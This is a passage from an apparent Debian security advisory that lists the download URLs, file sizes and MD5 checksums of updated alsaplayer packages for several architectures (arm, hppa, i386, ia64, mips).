    Size/MD5 checksum:    25004 f9298a89ec2e3cf70f255d6a0dedd22b
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_arm.deb
    Size/MD5 checksum:    29410 45c2839bd4b65d5fbc6ad6fda9761f96

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    30830 d32c6b62cc1d4a50af1b2f340c60e295
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    27870 46dff50cec7b6122ad8f056e42e07bf0
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    28772 2aa591d9ebe3f8e5a7996a31fae9f093
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    27926 604e9ddc8a8e48031934c1d8ff44278f
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    31560 956ddd8afc906f9c1ef658348d3eedf0
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    25962 3ebcd9cc144bb8386a1ca0f9a410985d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    29106 71dcd89706a5d8862d20228f3a65d9d1
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:   139484 ed32063973b85fb4b22d7dc0fe5f1eba
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    27858 84a05b131e76039bb03b854428cd6ed9
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:   191314 094ec3d9963ff0641a5748e51da11592
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    25812 5e7339d56deb8c88cd83f83895a716c5
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_hppa.deb
    Size/MD5 checksum:    85944 8c484572699fd8e8ae9e437c8c8f0777

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    30404 152b14037ca04c15f98d61da207d8d46
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    28100 f1ef493cd0e41107102a7d552b83563c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    26938 9fd4b50433e0e8059e841156d89265c8
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    81112 63d46351fcfaf549e0602289d9fd7139
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    25102 2b54d8b1f00a371d22b59d83e5cde354
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:   115288 902924f6ef4f2e63b66b183dc0c35334
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    26996 9d0e04a29f76e31f8b076ab3a689a23f
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    26732 a4c34cf4a0ab302a9ec079830bc078a5
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    28900 9153f6bcfa7b63b15a48f28a599bbc72
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:   158866 c35adec287030905bf0db4e27ab81d63
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    27682 122a2eaf526f4566d7a7486900bf31b3
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_i386.deb
    Size/MD5 checksum:    24994 1a43a121d1a49ca6873ba5095d859e62

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    26008 b582458d4fd4c5a0b38bab8b2f0459b9
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    29332 5f4ccdc8009a1370188025e7efba87eb
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    28878 dc628fa779e8485c9c3dab8363d5726c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    29486 3035fc70c59b1d1edd17725987f19bad
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    26340 6db7a892db68580708265873f6ce52b2
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    32072 20a46904c43bb27f793bcbbd38079156
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    28608 467d81086aa8141c67490d0c7b92f9e4
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    81542 5d309e66d4abe81b83e1e086575d10f5
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:   239982 8c1cf0558be5c8735b41160db61be0d3
  http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    33344 6b6c4685c617583e6a7e2619bc3be82c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:    28184 2fe8caf134eb15304354c3796e453a35
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_ia64.deb
    Size/MD5 checksum:   164272 48f8eb0310511c326642264a8a3cb63d

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:   165842 b16d5d2344a40bc23ab0e03094669839
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    27652 0a22b61200a7a29553c8ee85dd6a4f07
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    27092 f0afc829883f7f794b7d1675746f7d58
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    28030 c9ae0b3f54a88a4e11cded00fccba67c
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    25222 a9c8b5bfdafd442d5b286814c2ce680d
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    25072 07b4f0bf800449ab08c8015650c72776
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    26806 16b2d718d3acf15eb383bfd920c10480
  http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_mips.deb
    Size/MD5 checksum:    27066 3314a50149ea5dceae3e5467e76c7